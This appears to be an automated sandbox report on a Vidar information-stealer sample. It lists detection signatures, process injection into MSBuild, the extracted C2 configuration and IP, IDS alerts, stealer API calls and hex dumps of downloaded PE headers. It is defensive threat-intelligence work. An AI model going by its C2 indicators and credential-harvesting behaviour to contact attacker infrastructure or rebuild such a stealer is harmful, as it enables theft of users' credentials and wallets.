Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1527563
MD5:	e92d327838d5f6952f612283a2425e24
SHA1:	60c73cd8fb4f10628072f055770b472bb47db22f
SHA256:	25f720e9b969bdbece357a4704d4575a47ab8230affefbc2bfc467cb317835f1
Tags:	exeuser-Bitsight
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Searches for specific processes (likely to inject)

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 5276 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E92D327838D5F6952F612283A2425E24)

MSBuild.exe (PID: 2000 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "4b1193935308da1162176c44b42898a6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
dump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 5276	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 5276	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 5276	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 2000	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 2000	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSBuild.exe PID: 2000	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 2000	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.MSBuild.exe.400000.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.MSBuild.exe.400000.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.102cae0.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.102cae0.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
1.2.MSBuild.exe.400000.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.MSBuild.exe.400000.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.102cae0.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.102cae0.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.1000000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.1000000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 95.164.90.97, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 2000, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49782

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T03:15:34.150689+0200	2044247	1	Malware Command and Control Activity Detected	95.164.90.97	80	192.168.2.5	49782	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T03:15:34.971620+0200	2051831	1	Malware Command and Control Activity Detected	95.164.90.97	80	192.168.2.5	49782	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T03:15:33.524581+0200	2049087	1	A Network Trojan was detected	192.168.2.5	49782	95.164.90.97	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://t.me/ae5ed	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "4b1193935308da1162176c44b42898a6"}

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 44%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00411E5D CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	1_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C4A6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	1_2_6C4A6C80

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49728 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49945 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.3364863424.00000000203D8000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3382960691.000000006C6CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.3374207350.000000003819C000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.3369474050.000000002C2B8000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.3376385809.000000003E107000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3382960691.000000006C6CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.3364375289.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3361102109.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.1.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.3367175545.000000002634C000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.3371770837.000000003222B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101980F FindFirstFileExW,	0_2_0101980F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	1_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	1_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	1_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	1_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

1_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	0_2_0102D38D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	0_2_0102D38D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	1_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	1_2_004014AD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49782 -> 95.164.90.97:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.5:49782
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.5:49782

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199780418869

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 01:15:35 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 07 Oct 2024 01:15:40 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
